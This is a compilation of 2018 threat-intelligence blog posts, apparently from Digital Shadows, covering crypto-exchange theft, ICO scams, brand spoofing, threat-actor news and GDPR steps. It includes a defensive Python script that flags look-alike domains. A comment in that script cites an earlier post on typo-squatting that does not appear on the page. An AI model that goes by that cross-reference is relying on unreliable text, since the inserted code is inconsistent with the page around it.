    On January 26, 2018 the Japan-based cryptocurrency exchange Coincheck suffered a large-scale cyber-heist. Attackers reportedly stole 58 billion Japanese yen ($530 million) worth of NEM, a peer-to-peer cryptocurrency established in 2015. Coincheck announced it will reimburse most of the stolen funds to its 260,000 affected customers. As the technology and security framework supporting digital currencies expands, attackers will likely look for vulnerabilities, such as exchange platforms where digital “hot” wallets are connected to the internet. The consistently high value and increased availability of cryptocurrencies means threat actors will likely target them regularly this year.


    Dutch banks suffer DDoS attacks

    On 29 January 2018 financial institution Rabobank became the latest Dutch company to announce it had been affected by a distributed denial of service (DDoS) attack. Public reporting has been largely speculative, preventing independent assessment of the attacks. The botnet associated with the attacks has not been detected in other DDoS activities, and the size of the attacks (40Gbps) was relatively small, if accurately reported. Some media outlets linked the attacks to Russia, claiming they were retribution for recent reports of Dutch intelligence agencies infiltrating the Russia-linked group “APT-29” (Cozy Bear).


    Anonymous collective announces new phase of OpCatalunya

    On 29 January 2018 AnonPlus announced a new phase of OpCatalunya, the Anonymous operation supporting Catalan independence. OpCatalunyaNew has so far generated many DDoS claims and affected several Spanish companies across a variety of sectors. The catalyst was likely a Spanish Constitutional Court ruling on the investiture of regional president Carlos Puigdemont, an independence supporter. The coordination of the new campaign by small groups indicates the growing split in the Anonymous collective and has enabled operations to gain longevity and consistency of targeting.


    Severe RCE vulnerability in Cisco ASA devices

    Cisco released software updates addressing a remote code execution (RCE) vulnerability affecting Cisco Adaptive Security Appliance (ASA) software. At the time of writing there was no proof-of-concept exploit code identified for vulnerability CVE-2018-0101, nor any reports of exploitation by threat actors. However, as RCE vulnerabilities are attractive to threat actors, exploitation is a realistic possibility in the next three months to a year. Cisco provided a list of affected products, as well as details on how to identify vulnerable software versions.


    Four Ways Criminals Are Exploiting Interest in Initial Coin Offerings
    Thu, 01 Feb 2018 13:43:00 +0000

    Initial Coin Offerings (ICOs) are a way of crowdfunding cryptocurrencies and cryptocurrency platforms. By the end of 2017, almost $4 billion was raised in this way. However, as consumers rush to be the first to invest in a promising new cryptocurrency or platform, their investments can instead go into the account of criminals. These criminals seek to make their money in four main ways:

    • Targeting genuine cryptocurrency platforms
    • Exit scams
    • Imitating or spoofing cryptocurrency platforms
    • Price manipulation

    This is only one aspect of cryptocurrency fraud, but you can learn more in our latest research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.


    Targeting Genuine Cryptocurrency Platforms

    At the end of January, a Japanese cryptocurrency exchange platform called Coincheck announced the theft of over $500m in NEM. The cryptocurrency NEM has since stated that attackers targeted a vulnerable wallet that had not used the currency’s available security features. $530 million surpasses the record set by Mt Gox in 2014.

    Targeting these platforms doesn’t have to be complex. In July 2017, criminals compromised the CoinDash website, replacing the initial Ethereum address with one controlled by the attacker. This new address received at least 2,314 payments from prospective CoinDash investors, totaling over 40,000 Ether. Over $7 million in Ethereum had been transferred to the fake address by the time CoinDash noticed the issue and suspended the ICO.


    Figure 1: Attacker’s Ether wallet during CoinDash ICO in July 2017


    More recently, the Initial Coin Offering for blockchain application company Experty was targeted by actors who sent phishing emails to potential coin buyers, prompting them to send funds to an attacker-owned wallet in return for a 33% bonus. The attacker’s wallet reached about 125 Ether ($125,000). We’ll be digging into approaches to phishing and account takeover against cryptocurrency holders in a future blog.


    Exit scams

    An exit scam refers to a cryptocurrency or platform that is established with the plan of attracting many customers before disappearing with all of their funds. There have been a host of exit scams in 2017 and 2018, including Confido, Benebit and Plexcoin.

    This week, the US Securities and Exchange Commission (SEC) claimed to have shut down an alleged Initial Coin Offering scam by AriseBank. The site claims to have raised over $600 million of its $1 billion goal. The SEC determined that AriseBank had violated securities regulations, as it was selling financial products that required the firm to be registered with the SEC. While the SEC has put a concerted effort into identifying and assessing potentially fraudulent ICOs, the sheer number of new cryptocurrency products and platforms means exit scams will likely continue for some time.


    Spoofing Cryptocurrency Platforms

    Rather than create their own new cryptocurrency, criminals can also impersonate existing platforms. A recent example is the announcement that Telegram would be launching its own coin, which has led to a host of different spoof domains hoping to lure unsuspecting consumers into investing on the wrong platform. Despite Telegram stating that any announcement would be made first on Telegram, this has not stopped the creation of several spoof sites. Grampreico[.]com (shown below) is one such example, having made $2000 to date.

    Figure 3: Grampreico[.]com claiming to be the initial coin offering for “Gram” token

    A different, though similar, approach is to register a similar-looking domain and clone the contents of the target website. Myetherwallet[.]uk[.]com is a good example of such a spoof site: it offers to let you access your wallet in exchange for handing over your private key.

    Figure 4: Spoof site for myetherwallet[.]com


    Cryptocurrency Price Manipulation

    Just as traders illegally inflate prices of stock in the real world, so too do groups of cybercriminals. This technique is known as “pump and dump”, and several online groups exist to inflate the price of smaller, less well-known currencies in order to cash in on the increase in value.

    Figure 5 shows the process followed by one Discord “pump” group, describing how they first “spread great news on twitter and Reddit”, before “mass retweet, like and react on the tweet”.

    Figure 5: A description of how “pump and dump” works, as described in one Pump and Dump Discord group


    Questions to Ask Yourself Before Investing in an ICO

    ICOs can be a great way for consumers to identify promising coins and platforms early on and profit from their rise. However, potential investors should be wary of sites or sellers making unsolicited offers, or of coins that guarantee high returns without solid justification. Three questions you can ask yourself are:

    1. Does the coin you are looking to invest in have an active online community with engaged developers?
    2. Have other online users reported the coin as a scam?
    3. Does the coin’s documentation hide behind marketing jargon that makes no effort to explain the technical aspects?

    For those that do invest, make sure you have strong password hygiene and make use of multifactor authentication to secure your accounts.

    To learn about other tactics, including account takeover and cryptojacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.


    Why Marketing Leaders Must Take Action To Manage Digital Risk And Protect Their Brand
    Tue, 30 Jan 2018 14:14:20 +0000

    I am one of you. I have been in the marketing field for more than 20 years and have seen unimaginable technology shifts that have made the world a more connected and efficient digital machine. We can now engage digitally with consumers around the globe on so many screens (watch, mobile, tablet, laptop, desktop, TV, automobile, etc.), at any place and at any time. The companies we work for have greatly benefited from this new digital age. We now have data everywhere, including customers, employees, and third party data on all kinds of devices, on premise and in the cloud. Combine these two digital shifts and we have an amazing opportunity as marketers to engage in a personal way with our customers like never before. With this great opportunity, there also comes great risk if your company is not protecting itself from digital risks.

    Everyone knows about the brands that have been breached. You read about it in the headlines almost daily that another brand has been breached and the data belonging to hundreds of millions of customers and employees has been stolen. Breaches have become so common that we are all getting tired of hearing about it. Many of the breaches occur due to phishing and social engineering, making use of malicious websites, fake social media profiles, and fake mobile applications to trick customers and employees into unknowingly handing over their personal data and log-in credentials. This data is then used for profit by the attackers or sold on the open, deep, and dark web for others to do what they will. It impacts everyone including the company, the brand, customers, third parties, employees, you, me, and even our kids.

    As marketing leaders, we are all brand stewards for our company and our customers. We need to do everything we can to make our customers love us and trust us. We could do 99.999% of things right, but with one simple “We’ve been hacked” experience, it could wreck it all. That is why we must play an active role working with our security team and be proactive in managing digital risk to protect the brand. As I have learned over the years, the best way to help customers and businesses is to tell them real customer stories that they can relate to as they share the same pain and concerns. I am about to share some real customer stories with you. These stories are really important as many of you, your brand, and your customers may be impacted by these same issues. Here are some customer stories that are 100% real that every marketing leader should know about as these digital risks are your risks.

    1. We found malicious website domains that look like the real brand:

    By monitoring for registrations of domains that appear similar to a well-known brand’s website, a spoof domain was discovered. The domain had been registered overnight, swapping an “rn” for an “m” so it looked exactly like the brand’s .com website. The content was an exact mirror of the client’s legitimate site and, aside from lacking some functionality of the legitimate site, appeared genuine to the casual user. The goal of the fake website was to fool unsuspecting users into entering their usernames and passwords. The attackers could then use these credentials to log in as the customer, take over their account and drain their funds, resulting in upset customers who have had their money stolen and ultimately hold your brand accountable. Brand damage successful.

    The good news is with effective Digital Risk Management, you can identify these fake websites, and take them down before fraud is conducted against your customers.
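The “rn” for “m” swap described above, and the typo-squat registrations discussed in the Winter Olympics post earlier on this page, can be caught by reducing each new domain to a visual skeleton and comparing it with the protected brand. The following is an added example, not code from Digital Shadows or its SearchLight platform; the brand “acmebank”, its legitimate domains and every candidate registration are constructed.

```python
"""Flag look-alike domains that impersonate a protected brand.

Added example, not code from Digital Shadows or its SearchLight platform.
The brand "acmebank", its legitimate domains and all candidate domains are
constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional, Set
import unicodedata

# Letter sequences that render almost identically in common sans-serif fonts.
# The first pair is the "rn" for "m" swap described in the post.
CONFUSABLE_SEQUENCES = [("rn", "m"), ("vv", "w"), ("cl", "d")]
# Digits commonly substituted for letters, plus separators that are ignored.
CONFUSABLE_CHARS = str.maketrans(
    {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "-": "", "_": ""}
)


def skeleton(label: str) -> str:
    """Reduce a DNS label to a visual skeleton so look-alikes compare equal."""
    text = unicodedata.normalize("NFKD", label.lower())
    text = "".join(ch for ch in text if not unicodedata.combining(ch))  # drop accents
    text = text.translate(CONFUSABLE_CHARS)
    for sequence, replacement in CONFUSABLE_SEQUENCES:
        text = text.replace(sequence, replacement)
    return text


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: edits plus swaps of adjacent characters."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent transposition
    return d[-1][-1]


def refang(domain: str) -> str:
    """Turn a defanged indicator such as acmebank[.]uk[.]com back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").strip(".")


@dataclass
class Finding:
    domain: str
    brand: str
    reason: str


def classify(domain: str, brand: str, legitimate: Set[str]) -> Optional[Finding]:
    """Explain why `domain` looks like an impersonation of `brand`, or return None."""
    host = refang(domain)
    if host in legitimate:
        return None
    brand_skel = skeleton(brand)
    for label in host.split(".")[:-1]:  # every label except the TLD
        if label == brand:
            return Finding(host, brand, "exact brand name as a label of an unknown domain")
        label_skel = skeleton(label)
        if label_skel == brand_skel:
            return Finding(host, brand, "homoglyph of the brand (for example 'rn' for 'm')")
        if osa_distance(label_skel, brand_skel) == 1:
            return Finding(host, brand, "one-edit typo of the brand")
        # Substring matching is noisy for short brand names, so it is gated on length.
        if len(brand_skel) >= 6 and brand_skel in label_skel:
            return Finding(host, brand, "brand embedded in a longer label")
    return None


def scan(domains: List[str], brand: str, legitimate: Set[str]) -> List[Finding]:
    """Classify each newly observed domain and keep only the suspicious ones."""
    findings = [classify(d, brand, legitimate) for d in domains]
    return [f for f in findings if f is not None]


# Constructed sample feed: one legitimate domain, four impersonations, one unrelated.
BRAND = "acmebank"
LEGITIMATE = {"acmebank.com", "www.acmebank.com"}
NEW_REGISTRATIONS = [
    "acmebank.com",          # legitimate, ignored
    "acrnebank.com",         # "rn" for "m"
    "acmebank[.]uk[.]com",   # brand as a subdomain of someone else's domain
    "acmebnak.com",          # transposed letters
    "acmebank-login.com",    # brand plus a lure word
    "unrelated.org",
]

if __name__ == "__main__":
    for finding in scan(NEW_REGISTRATIONS, BRAND, LEGITIMATE):
        print(f"{finding.domain:24} {finding.reason}")
```

Feed it the day's new registrations (or a certificate transparency stream) and route findings to whoever handles takedowns; the `legitimate` set is the allowlist that keeps your own domains out of the alerts.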

    Example: Malicious website domain detected, impact, recommended action, and takedown.

    2. Fake social media profiles that are indistinguishable from your real brand:

    By monitoring social media profiles for a very large customer, we discovered more than 500 fake social media profiles that were hijacking their brand. Some of the profiles looked so legitimate that the company was amazed by how closely the cyber criminals had replicated its social media presence; even some employees could not determine whether a profile was real or not. Cyber criminals used these fake profiles to sell counterfeit products and to steal credit cards as well as credentials. Brand Damage Successful.

    The good news is with effective Digital Risk Management, fake social media profiles can be quickly identified and taken offline.

    Fake social media profile example

    3. Your customers unknowingly using fake mobile applications that exploit their privacy:

    By monitoring official app stores, including the Apple App Store and Google Play, as well as third party app stores for references to the company’s branding, a malicious app impersonating their brand was detected. Analysis of this malicious app revealed that it had spyware capabilities and could steal information from its users, ranging from sensitive documents to login credentials. Brand Damage Successful.

    The good news is that with effective digital risk management, the company was provided with an overview of the risks associated with the mobile application, screenshots of the application, and critically the ability to have the malicious app removed from the store.

    Example: Fake Mobile App detected, impact, recommended action, and takedown

    These are just three real stories that had the potential to impact consumers and the brands they trust. There are hundreds more examples of brand exposure that you as a marketing leader must learn more about. You can also read up on additional brand exposure use cases here. Earlier, I asked you to listen to these stories as these same stories could be happening to your customers, putting your brand at risk. It is not my intention to scare you but to educate you on what is going on right now, today, this very minute.

    This is why, as marketing leaders, we must take action to work with our security team to manage digital risk and protect our brand. By considering the security implications of phishing sites and social media, security shifts from an IT function to a company-wide concern. If you take action, you can minimize the impact of a hack or stop it before it affects your customers and your brand.

    Interested in learning more about protecting your brand from digital risks and the dark web? Join our webinar with FitBit on Brand Protection.


    Dan Lowden
    CMO, Digital Shadows

    Dan Lowden has more than 20 years of executive-level experience in technology marketing. He has successfully driven demand generation and brand leadership for large enterprises and startups in security, mobile computing, wireless services, enterprise software, and cloud. Previously Dan was Chief Marketing Officer at Invincea, a machine learning next-gen antivirus company that was recently acquired by Sophos. Prior to that, he was VP of Marketing at vArmour, a leading data center and cloud security company. Previous roles also include VP of Marketing at Digby (acquired by Phunware), and VP of Marketing and Business Development at Wayport (acquired by AT&T). In addition, he has held marketing leadership positions at IBM, NEC, and Sharp Electronics. Dan holds a Bachelor of Science in Finance from Rider University and an MBA in International Business from Rutgers Graduate School of Management.

    Shadow Talk Update – 01.29.2018
    Mon, 29 Jan 2018 18:38:43 +0000

    In this week’s Shadow Talk podcast episode, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.

    Dark Caracal Infiltrates Devices for Espionage

    The “Dark Caracal” threat group has conducted espionage through mobile and desktop malware variants since 2012, researchers have determined. The group delivered malware via phishing links and physical access to targeted devices, harvesting user information without particularly sophisticated tactics, techniques and procedures (TTPs). Although Dark Caracal has been allegedly linked to the Lebanese state, inconsistent geographic targeting, lack of tailored phishing content and operational security flaws do not suggest an organized, state-led campaign. Mobile devices will highly likely remain vulnerable to espionage and financially driven threats, given the valuable nature of their stored content.

    Dridex Campaign Debuts Distribution Tactic

    A new spam email campaign delivering the “Dridex” banking malware demonstrated a previously unreported tactic: compromising file transfer protocol (FTP) servers to act as the download location for malicious documents. The threat actors were likely trying to avoid detection by email gateways and network policies, which consider FTP servers as trusted locations. Security company Forcepoint attributed the campaign to the “Necurs” botnet, based on its previous association with Dridex, although this was a low-scale campaign in comparison with prior Necurs activity. More targeting of FTP servers to distribute malware is likely.

    Turla Updates Malware After NCSC Public Advisory

    The “Neuron” malware associated with “Turla”, a Russia-linked advanced persistent threat (APT) group, was updated five days after a public advisory on Turla activity by the United Kingdom National Cyber Security Centre (NCSC). Neuron was adapted to avoid identification by the malware detection signatures published by the NCSC. Although the reason for the update is unclear, Turla may have responded to public reporting on its own campaigns. Alternatively, Turla may have experienced diminished success following the advisory, when new defensive measures were taken. As threat actors can quickly change malware obfuscation techniques, organizations should be proactive about network security, using threat intelligence, network log monitoring and detection signatures.

    Misconfigured Jenkins Servers Exposed Companies’ Sensitive Data

    A researcher identified misconfigured servers associated with Jenkins, a software development tool. The accessed servers contained sensitive data pertaining to multiple British companies, including usernames, passwords, private keys and Amazon WorkSpaces access tokens. The researcher identified exposed platforms using the internet-of-things search engine Shodan, and then scraped the revealed URLs to find unauthenticated login pages. It is unknown whether threat actors accessed any misconfigured servers; however, the method used to detect the vulnerable servers is easily replicable. Companies should ensure use of unique credentials and multi-factor authentication for internet-facing and cloud-based assets.

    Russian Fuel Customers Shortchanged in Criminal Operation

    A Russian criminal operation was disrupted after the perpetrators used software to over-charge individuals purchasing gas in Southern Russia. Malicious software was applied to electronic gas pumps and reportedly charged customers for more fuel than was delivered, shortchanging victims 3% to 7% per gallon of fuel pumped. The software enabled pumps, cash registers and back-end systems to display false data to victims and relied on complicit insiders at fuel stations. The developer of the software was reportedly arrested. The lucrative nature of the fuel industry means it will continue to be targeted by financially motivated criminal actors.

    Fancy Bears Leaks Documents from International Luge Federation

    The “Fancy Bears” hacking group publicly leaked documents purportedly sourced from the International Luge Federation (FIL), and claimed the violation of “principles of fair play”, particularly regarding drug tests. It is unknown how and when the documents were obtained, although threat group “APT-28” (aka Fancy Bear) allegedly targeted certain members of the International Olympic Winter Sports Federations in late 2017, including the FIL. The precise relationship between Fancy Bears and APT-28 is not publicly known, although APT-28 were previously associated with the compromise of the World Anti-Doping Agency in 2016. More leaks by Fancy Bears are likely in the near future.

    US Media Personalities Targeted in Twitter Phishing Campaign

    Media personalities and conservative individuals in the United States were targeted by a Twitter phishing campaign, potentially conducted by the Turkish Cyber Army. At least three Twitter accounts were confirmed as compromised, including that of journalists Sara Carter (@SaraCarterDC) and Greta Van Susteren (@greta), as well as Sheriff David Clarke (@SheriffClarkeTC). The campaign employed a spoofed Twitter login page, which was likely used to harvest credentials and compromise the three accounts. Although no official claim of responsibility was detected from the Turkish Cyber Army, this campaign would be consistent with previously observed activity. More media outlets will likely be targeted in the immediate future.



    Data Privacy Day: 8 Key Recommendations for GDPR Readiness
    Fri, 26 Jan 2018 05:18:37 +0000

    This Sunday is Data Privacy Day, “an international effort held annually on January 28th to create awareness about the importance of respecting privacy, safeguarding data and enabling trust”[1]. With GDPR regulations coming into effect May 2018, data privacy is even more top of mind for all organizations.

    If you have the responsibility for ensuring that your business meets the obligations under the GDPR, you are most likely either already down the path to compliance, or at least getting serious about plans to become compliant. Data exposure is becoming increasingly important as local, national, and international legal obligations bring about greater responsibilities for organizations to protect customer data in terms of compliance, notification, and monitoring.


    Here at Digital Shadows, we focus on providing our clients with comprehensive data loss monitoring and management across the widest range of intelligence sources found in the open, deep, and dark web. Through the combination of data science and machine learning, and more than 50 intelligence analysts, our service enables them to mitigate risk and demonstrate a long-term commitment to European and other regulators on this important issue.

    The GDPR regulations are an evolution of existing European Union (EU) privacy legislation ensuring that companies respect privacy, gain proper consents, and responsibly protect information and data under their control. While we recommend clients seek legal support, a great deal can be achieved by the following 8 activities:

    1. Scope Your Data – Make sure that you understand which data is in scope for your organization. This should include data about your customers and employees (as a Controller), as well as data you process on behalf of other organizations (as a Processor). GDPR protects the personal data of individuals in the EU regardless of where that data is stored or processed. This also requires that organizations identify any new sensitive data types, such as health information or information relating to children.
    2. Understand Data Transfer Agreements – Businesses need to clearly understand in which jurisdictions data is being held and accessed from, and ensure that the transfers that take place are properly accounted for. This is especially important if some of that data is held outside of the EU, as a recognized transfer mechanism (such as an adequacy decision or standard contractual clauses) will be required.
    3. Update Consent Methods or Legal Basis for Processing – Update the methods via which consent is sought from individuals, or how the legal basis for lawful processing of that data is established. This should include assurances that the spirit of the data protection principles has been respected.
    4. Prepare for Subject Access Requests – Individuals can already request to see a copy of the information an organization holds about them. Under GDPR, businesses cannot charge EU consumers for access of data that may be held and must respond within one month of receiving the request. Consumers have additional rights such as ‘the right to be forgotten,’ and the right to modify and export records that must be properly addressed.
    5. Prepare for 72-Hour Notification – New rules govern how quickly authorities must be notified of a data breach. Data controllers must notify the national data protection regulator within 72 hours of becoming aware of a personal data breach, unless the breach is unlikely to result in a risk to individuals’ rights and freedoms. Where the breach is likely to result in a high risk to those rights and freedoms, the affected individuals must also be told without undue delay.
    6. Update Your Contracts with New Obligations – The legal contracts and policies must reflect suppliers’ obligations to their clients and the updated consent and requirements set out above.
    7. Update Your Privacy Policies and Statements – Ensure that the privacy policies and statements to consumers appropriately reflect obligations. The policies must be concise, transparent, intelligible, and free of charge. This includes the tailoring of language to different age groups; privacy information for children must be written appropriately.
    8. Designate a Data Protection Officer – Some organizations are legally required to nominate a Data Protection Officer (DPO): public authorities, and organizations whose core activities involve large-scale, regular and systematic monitoring of individuals or large-scale processing of special categories of data such as health information. Even where it is not mandatory, a DPO is a sensible way to assign clear accountability for data protection.

    To learn more about becoming GDPR compliant, check out our recent paper, The Path to GDPR Compliance, where we provide recommendations  and the key resources that organizations can utilize to instill customer trust and brand protection.

    If you want to get involved in this year’s Data Privacy Day efforts, visit StaySafeOnline’s website for more information.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 



    Don’t Rely on One Star to Manage Digital Risk, The Key is Total Coverage Tue, 16 Jan 2018 16:12:58 +0000 This post originally appeared on

    Vince Lombardi, one of the greatest coaches of all time said, “The achievements of an organization are the results of the combined effort of each individual.” Think about the most successful coaches and you’ll see a common thread – the ability to bring players and staff together and use their talents effectively and intelligently to defeat opponents. Phil Jackson accomplished this with different NBA franchises and Joe Gibbs with different quarterbacks. They didn’t count on any one “star” to carry the team. Nor did they focus their efforts defending against one big threat. They led their teams to victory by looking at the big picture and understanding how to strategically apply capabilities to defeat whatever the opposition pulled out of their bag of tricks.

    Wouldn’t it make sense to follow a similar approach to defeat adversaries and mitigate digital risk, the risk associated with expanding our digital footprint as we increase business activities on the internet and via cloud solutions? But, typically, we don’t.

    Just as great coaches know they’re up against an entire team that can vary their plays and draw on different skills with the sole aim of defeating them, the risks as you digitally transform your business come from all kinds of adversaries and places beyond the boundary. Individually, you don’t just have a dark web problem, or an open source problem or a social media problem. You have a problem with ALL external digital risks and threat actors seeking to do your business harm. 

    Digital risks include cyber threats, data exposure, brand exposure, third-party risk, VIP exposure, physical threats and infrastructure exposure. Often these threats and risks span data sources and cannot be detected in full context by any point solution or even by multiple solutions used in isolation. You need insight across the widest range of data sources possible to mitigate digital risk and better protect your organization. Here are three examples.  

    1. We all know organizations struggle to keep up with patching, and this challenge isn’t expected to go away any time soon. Gartner predicts that through 2020, 99% of vulnerabilities exploited will continue to be the ones known by security and IT professionals for at least one year. Addressing every vulnerability as soon as a patch is issued isn’t possible for most IT teams. But determining which vulnerabilities to patch first can be problematic. By monitoring open, deep and dark web forums as well as social media you can learn which vulnerabilities are being discussed as popular vectors for attack. These sources can also reveal which exploit kits are using specific vulnerabilities and even if those exploit kits are being used to target your industry. Armed with this information, you can make more informed decisions about which systems and applications to patch first and more effectively and efficiently mitigate risk. 
    2. Ideologically motivated hacktivists are far from quiet. They typically use social media to promote their cause and garner attention, and often announce their targets on Facebook or Twitter. They also use Internet Relay Chat (IRC) to orchestrate attacks in real time. Monitoring social media and open-source IRC channels for an uptick in hashtags and traffic is a leading indicator of whether a cause is gaining traction. Mentions of your company, key executives or IP addresses will help you determine if you’re being targeted so you can proactively boost security controls.
    3. A more complex example, but one that has been in the spotlight recently, is database extortion. In this scenario, attackers look for publicly exposed data stores, for example open Amazon S3 buckets or unauthenticated MongoDB instances. From there, they may be able to find information allowing them to remotely connect to a server or desktop and infiltrate your organization further. Or, as in the case of the MongoDB extortion pandemic, they can replace the data with a ransom request for bitcoin payment in exchange for restoration of the database. Should the ransom request go unheeded, attackers may then apply pressure on the CEO by posting a message to Pastebin or via social media. In this scenario there are several points of compromise and several ways to gain a deeper understanding of the attack. To learn the entire sequence of events, the impact to your organization and how to mitigate digital risk in the future, you need more than visibility into S3 buckets. You need access to the marketplaces that sell hacked servers and remote desktop protocol (RDP) access, to look for mentions of your IP addresses. Access to Pastebin and monitoring of social media channels will allow you to check for mentions of your company and/or executives. The dark web can provide information on threat actor profiles to understand their motivation and gauge credibility.

    In each of these three examples, tracking just one source, or even all sources but in isolation would not give you the full context for any one of these threats. Like a coach, you need to be able to see the big picture with an approach that monitors the entire Internet for risks to your business. Only then can you take the right actions to keep your business and reputation intact and mitigate digital risk in the future.  

    Want to learn how we can help manage your organization’s digital risk? Watch our full demo video here.


    Another Year Wiser: Key Dates to Look Out For In 2018 Wed, 10 Jan 2018 17:37:57 +0000 Early last year, we published a blog outlining the events of 2017 that were most likely to attract the attention of malicious actors who would present potential risks to your organizations. Unsurprisingly, many of the usual suspects were active at significant points in the year, such as tax deadline day, the German elections, and Black Friday.

    We are doing this again this year and want to make sure that you have these key events on your radar. When assessing the key events of 2018, we need to look at the activities of cybercriminals, hacktivists and nation-state affiliated actors.

    Date         | Event                              | Actor                                     | Affected Geographies   | Targets
    -------------|------------------------------------|-------------------------------------------|------------------------|-------------------------------------------------
    6 February   | G20 summit                         | Nation State; Hacktivism                  | Argentina              | Government
    9 February   | Winter Olympics                    | Nation State; Hacktivism; Cybercrime      | South Korea            | Event Sponsors, Consumers, Retailers; Hospitality
    13 February  | Tibetan Independence Day           | Nation State; Hacktivism                  | Tibet; China; India    | Government
    4 March      | Italian Elections                  | Nation State                              | Italy                  | Government
    18 March     | Russian Presidential Election      | Nation State                              | Russia                 | Government
    17 April     | Tax Deadline Day                   | Cybercriminal                             | United States          | Consumers
    14 June      | FIFA World Cup                     | Cybercriminal; Nation State; Hacktivism   | Russia                 | Event Sponsors, Consumers, Retailers; Hospitality
    14 August    | Pakistan Independence Day          | Nation State                              | India; Pakistan        | Unknown
    9 September  | Swedish Elections                  | Nation State                              | Sweden                 | Government
    18 September | Anniversary of the Mukden Incident | Hacktivism                                | Japan                  | Unknown
    November     | Irish Presidential Election        | Nation State                              | Ireland                | Retail, Consumers
    5 November   | OpVendetta                         | Hacktivism                                | All                    | Finance
    23 November  | Black Friday                       | Cybercriminal                             | United States          | Retail, Consumers
    26 November  | Cyber Monday                       | Cybercriminal                             | United States          | Retail, Consumers
    25 December  | Christmas Day                      | Hacktivism                                | All                    | Online Gaming


    With an ever-increasing amount of money spent online, there are more opportunities for card not present fraud (fraud that can occur with transactions that are conducted online or over the phone). Just as we discovered in our “Retail Risks” whitepaper, these are risks that exist throughout the year. During Black Friday and Cyber Monday, criminal efforts tend to increase to take advantage of the increased number of transactions being made. Similarly, as we approach 17th April (that’s two days later than normal), we’re likely to see new techniques around tax return fraud emerge as criminals look to bypass IRS antifraud measures.

    There are other events that are likely to provide rich pickings for cybercriminals. Two years ago, we wrote about the risks to the Rio Olympics for retailers, sponsors, and consumers. Similarly, the Winter Olympics and the FIFA World Cup are expected to attract cybercriminals seeking to exploit card-wielding tourists.



    Despite the predictability of some recurring online protests, the significance of hacktivist campaigns is often difficult to anticipate. One example of such a recurring campaign is OpVendetta, which takes place each year on November 5. We monitor the levels of participation and organization to assess the likely impact of a campaign, as we did recently with the OpCatalunya operation that targeted companies operating in Spain.

    Of course, hacktivist campaigns are not always as they appear; Anonymous Poland, for example, have previously demonstrated characteristics of a nation-state proxy. We will have to wait and see whether more hacktivist groups demonstrate techniques beyond the typical denial of service attacks and website defacements.


    Nation-State/Nation-State Affiliated

    Since the 2016 U.S. Presidential Election, election season has become a common time of the year for nation states and their affiliated groups to develop online campaigns. There are a range of tools and techniques widely available to actors who seek to influence elections. We’ll be keeping an eye on a host of elections coming up in 2018, but the key ones will be the Russian, Swedish, and Italian elections.


    While this is by no means a definitive list of 2018 hot spots, outlining these events at the beginning of the year provides us with areas of focus. With this focus, we can monitor for the key drivers and assess the likely impact of a particular campaign or event. To stay up to date with the latest key events, threat intelligence, and research, subscribe to our email list here.

    Why All Companies, CEO, CFO, CLO, and Board of Directors Should Require Digital Risk Management to Mitigate Corporate Risk Wed, 10 Jan 2018 16:16:27 +0000 Cyber attacks on businesses are now weekly news, as data breaches are announced regularly. Until recently, however, many corporate executives did not understand, or share the view, that Digital Risk needs to be addressed at the Board level. The Board’s role in understanding and monitoring digital and cyber risk has been highlighted by a multitude of lawsuits alleging that Boards were asleep at the switch in the face of a known danger.

    Executives and Boards at all companies, especially public companies, face mounting pressure to consider what a worst-case cyber event would look like and how that event would be handled. What corporate governance structures would kick in? What will the legal fallout be —whether it is privacy litigation, shareholder suits or criminal investigations? To fully grasp the magnitude of such risk, Boards must address specific questions and implement effective policies that protect their customers, their organizations and themselves. In some states and countries, Board members may be personally liable for cybersecurity gaps and experts foresee that personal liability will only accelerate.

    Board of Director members are responsible for ensuring the corporation is managed in the shareholders’ best interest including:

    1. Fiduciary duties of Directors and Officers regarding Digital Risk and Cybersecurity. Most officers and directors understand that they must act on an informed basis, in good faith, and in the company’s best interests. Proper preparedness and risk management are critical to insulating officers and directors from liability. Boards must hold frequent meetings to analyze cyber risks and implement potential plans of action. If appropriate, create a committee to review cyber issues and investigate data incidents and breaches. Boards must implement a risk management program and a monitoring plan, test the program to ensure compliance, and investigate possible violations.
    2. Officers and Directors should discharge their Digital Risk fiduciary duties. Digital Risk management programs must have the right technologies in place to identify where risks can have the most impact on the business and brand. Companies should have policies in place that detail the expected response to incidents and ensure that system controls are in place. A prepared team is needed, equipped with the tools and ability to take immediate action when problems arise and have the authority to monitor and test, both internally and externally, potential threats. Cyber incidents impact multiple levels of an organization and departments including legal, IT, risk/insurance, human resources, marketing, and public relations. These departments should be tasked with providing input in addition to that of board members and management. The companies best prepared to prevent and respond to cyber attacks recognize that this multifaceted preparedness is an ongoing cycle, and not simply a one-time list of tasks to complete.

    To demonstrate that a Board has properly discharged its duties, it must work with management to ensure proper teams have organized plans to prevent and respond to any breaches. Therefore, a company must constantly assess cyber risk trends and threats. Just because nothing appears to be happening on a daily, weekly, monthly or annual basis, does not mean an incident may not occur.

    The business judgment rule is a legal principle protecting officers, directors, managers and other agents of a corporation from liability for loss incurred as a result of business decisions that are within their authority and power to make when sufficient evidence demonstrates that the transactions were made in good faith. To ensure protection under the business judgment rule, it is wise to have regular presentations for pertinent committees to provide updates on trends and threats, and to ensure that your security IT practices are up to date.

